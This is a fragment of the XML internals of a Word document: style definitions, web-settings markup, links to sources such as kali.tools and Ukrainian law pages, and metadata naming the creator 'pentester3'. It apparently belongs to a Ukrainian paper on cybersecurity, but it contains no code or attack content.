    <w:basedOn w:val="a"/>
    <w:link w:val="ac"/>
    <w:rsid w:val="0072630A"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ac">
    <w:name w:val="Основной текст Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ab"/>
    <w:rsid w:val="0072630A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ru-RU" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel39">
    <w:name w:val="ListLabel 39"/>
    <w:qFormat/>
    <w:rsid w:val="0096070A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00CE4163"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CE4163"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CE4163"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CE4163"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="ae">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00B80A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linecode">
    <w:name w:val="inlinecode"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="004E16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27756">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="140581479">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="151652247">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="159777901">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="327170939">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="333917281">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="381054006">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="578907797">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="737287110">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="858200904">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="863328643">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="900095269">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1034845558">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="777287633">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1089691592">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1111775656">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1126656738">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1133861610">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1250505416">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1346789704">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="434058799">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1357999865">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1413040239">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1510371478">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="192499526">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1534267860">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1600528939">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1720589255">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1945381697">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1945573420">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1956446365">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2020694226">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2032028084">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="205600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k.wikipedia.org/wiki/&#1050;&#1110;&#1073;&#1077;&#1088;&#1072;&#1090;&#1072;&#1082;&#1072;"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ua-referat.com/&#1030;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1110;&#1103;"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zakon2.rada.gov.ua/laws/show/80732-10"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s://ubuntu.ru/about"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http://zakon2.rada.gov.ua/laws/show/80731-10"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s://developer.mozilla.org/uk/docs/Learn/Server-side/Django"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kali.tools/?p=2330"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56D9C7-18B6-4021-9375-CB1E23281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19708</Words>
  <Characters>112341</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>936</Lines>
  <Paragraphs>263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131786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pentester3</dc:creator>
  <cp:lastModifiedBy>1</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-20T15:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-20T15:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>